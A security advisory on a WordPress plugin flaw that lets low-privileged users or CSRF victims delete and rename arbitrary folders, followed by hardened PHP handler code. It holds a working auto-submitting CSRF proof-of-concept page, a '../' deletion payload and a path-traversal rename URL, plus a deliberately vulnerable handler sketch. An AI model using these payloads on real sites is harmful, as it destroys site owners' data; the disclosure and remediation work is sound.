wpexploit / WPScanTeam / WPEX-ID: B2B405AC-88B4-4201-BDC3-9D5842DB2AC5
Published: Jul 02, 2019

Insert or Embed Articulate Content into WordPress <= 4.2999 - Authenticated Arbitrary Folder Deletion and Rename


EPSS: 0.001 (Low), percentile 22.8%

The wp_ajax_del_dir() and wp_ajax_rename_dir() AJAX handlers in functions.php perform no CSRF (nonce), authorisation (capability) or path traversal checks. Any authenticated user, with a role as low as Subscriber, can therefore delete and rename arbitrary folders. Because there is no nonce check, an attacker can also make such an authenticated user perform these actions through a CSRF request.

CSRF proof of concept: a page that auto-submits a del_dir request on behalf of the logged-in victim:

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="del_dir" />
      <input type="hidden" name="dir" value="" />
    </form>
  </body>
</html>

The dir parameter is not restricted to the plugin's own folder; for example, setting it to '../' deletes the contents of wp-content/uploads.

To rename wp-content/uploads/articulate_uploads and move it out of the uploads folder to wp-content/yolo (the '../../' in title walks up two levels):

https://<BLOG>/wp-admin/admin-ajax.php?action=rename_dir&dir_name=/&title=../../yolo/
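For both handlers described above, the following is an added illustration (not the plugin's own code) of the shape of the vulnerable deletion handler next to hardened del_dir and rename_dir handlers that add the three missing checks: a nonce check against CSRF, a capability check for authorisation, and confinement of the resolved path to the plugin's upload folder. The hook names wp_ajax_del_dir and wp_ajax_rename_dir and the dir, dir_name and title parameters are taken from the advisory; the articulate_example_* function names, the nonce action strings and the choice of the upload_files capability are assumptions made for this example, and the code assumes it is loaded inside WordPress so that core functions such as wp_upload_dir() and check_ajax_referer() exist.

```php
<?php
// Added example, not the plugin's code. Assumes it runs inside WordPress
// (wp_upload_dir(), check_ajax_referer(), current_user_can(), wp_unslash(),
// wp_send_json_*() are core functions). Hook and parameter names come from the
// advisory; the articulate_example_* names, nonce actions and the 'upload_files'
// capability are illustrative assumptions.

function articulate_example_base() {
    // realpath() returns a canonical absolute path (symlinks collapsed) or false.
    return realpath( wp_upload_dir()['basedir'] . '/articulate_uploads' );
}

// Canonical path of $base/$relative if it lies strictly inside $base, else null.
// Rejects '../' escapes, absolute paths, symlinks pointing outside, NUL bytes,
// and paths that do not exist (nothing to delete or rename there).
function articulate_example_confine( $base, $relative ) {
    if ( $base === false || strpos( $relative, "\0" ) !== false ) {
        return null;
    }
    $candidate = realpath( $base . DIRECTORY_SEPARATOR . $relative );
    if ( $candidate === false ) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp( $candidate, $prefix, strlen( $prefix ) ) === 0 ? $candidate : null;
}

function articulate_example_param( $name ) {
    return isset( $_REQUEST[ $name ] ) ? (string) wp_unslash( $_REQUEST[ $name ] ) : '';
}

// Shape of the handler the advisory describes: the request parameter goes
// straight into a filesystem call with no nonce, capability or path check,
// so dir=../ removes everything under wp-content/uploads.
function articulate_example_del_dir_vulnerable() {
    articulate_example_rmdir_recursive( articulate_example_base() . '/' . articulate_example_param( 'dir' ) );
    wp_die();
}

// Hardened deletion handler.
function articulate_example_del_dir_hardened() {
    // 1. CSRF: the request must carry a nonce minted with wp_create_nonce( 'articulate_del_dir' )
    //    in its _ajax_nonce field; a cross-site form cannot know it. Dies on failure.
    check_ajax_referer( 'articulate_del_dir', '_ajax_nonce' );
    // 2. Authorisation: Subscribers do not have upload_files, so they stop here.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // 3. Path traversal: the target must resolve to somewhere inside articulate_uploads.
    $target = articulate_example_confine( articulate_example_base(), articulate_example_param( 'dir' ) );
    if ( $target === null ) {
        wp_send_json_error( 'invalid directory', 400 );
    }
    articulate_example_rmdir_recursive( $target );
    wp_send_json_success();
}

// Hardened rename handler. The source is confined as above; the destination does
// not exist yet, so the new name is restricted to a plain sibling name instead.
function articulate_example_rename_dir_hardened() {
    check_ajax_referer( 'articulate_rename_dir', '_ajax_nonce' );
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $src   = articulate_example_confine( articulate_example_base(), articulate_example_param( 'dir_name' ) );
    $title = articulate_example_param( 'title' );
    $bad   = $title === '' || $title === '.' || $title === '..' || strpbrk( $title, "/\\\0" ) !== false;
    if ( $src === null || $bad ) {
        wp_send_json_error( 'invalid directory', 400 ); // title=../../yolo/ is rejected here
    }
    $dest = dirname( $src ) . DIRECTORY_SEPARATOR . $title;
    if ( file_exists( $dest ) || ! rename( $src, $dest ) ) {
        wp_send_json_error( 'rename failed', 409 );
    }
    wp_send_json_success();
}

function articulate_example_rmdir_recursive( $path ) {
    $entries = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator( $path, FilesystemIterator::SKIP_DOTS ),
        RecursiveIteratorIterator::CHILD_FIRST
    );
    foreach ( $entries as $entry ) {
        $entry->isDir() ? rmdir( $entry->getPathname() ) : unlink( $entry->getPathname() );
    }
    rmdir( $path );
}

add_action( 'wp_ajax_del_dir', 'articulate_example_del_dir_hardened' );
add_action( 'wp_ajax_rename_dir', 'articulate_example_rename_dir_hardened' );
```

Two design points matter here. The confinement compares the realpath() result against the base plus a trailing separator, so a sibling such as articulate_uploads_old or the base folder itself is never treated as inside; and for rename the destination is rebuilt from the confined source's parent plus a separator-free name, which removes the need to resolve a path that does not exist yet.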
